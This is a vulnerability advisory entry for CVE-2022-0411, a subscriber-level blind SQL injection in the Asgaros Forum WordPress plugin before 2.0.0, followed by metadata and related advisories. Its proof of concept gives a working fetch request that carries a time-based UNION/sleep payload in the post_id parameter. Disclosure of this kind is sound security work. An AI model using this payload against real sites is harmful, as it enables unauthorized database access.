Asgaros Forum < 2.0.0 – Subscriber+ Blind SQL Injection | CVE 2022-0411 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape the post_id parameter before using it in a SQL statement via a REST route of the plugin (accessible to any authenticated user), leading to a SQL injection

Proof of Concept

As any authenticated user, such as subscriber

To get the nonce: /wp-admin/admin-ajax.php?action=rest-nonce

fetch("?rest_route=/asgaros-forum/v1/reaction/1/hello", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": "post_id=1 UNION SELECT 1, 1, 1, 1, 1,2,3,4,5,sleep(5) FROM dual -- g&_wpnonce=59c63b25b1",
  "method": "POST",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

Fixed in 2.0.0

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2669226/asgaros-forum

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

35272197-c973-48ad-8405-538bfbafa172

Timeline

Publicly Published

2022-01-31 (about 2 years ago)

Added

2022-01-31 (about 2 years ago)

Last Updated

2022-04-12 (about 2 years ago)

Other

Published

Title

Published

2015-03-31

Title

SP Project & Document Manager <= 2.5.3 - Blind SQL Injection

Published

2024-03-28

Title

WordPress Announcement & Notification Banner Plugin – Bulletin < 3.9.0 - Authenticated (Administrator+) SQL Injection

Published

2024-02-09

Title

Awesome Support – WordPress HelpDesk & Support Plugin < 6.1.8 - Authenticated (Subscriber+) SQL Injection

Published

2024-03-13

Title

Automatic < 3.92.1 - Unauthenticated SQL Injection

Published

2014-11-25

Title

wpDataTables < 1.5.4 - Unauthenticated SQL Injection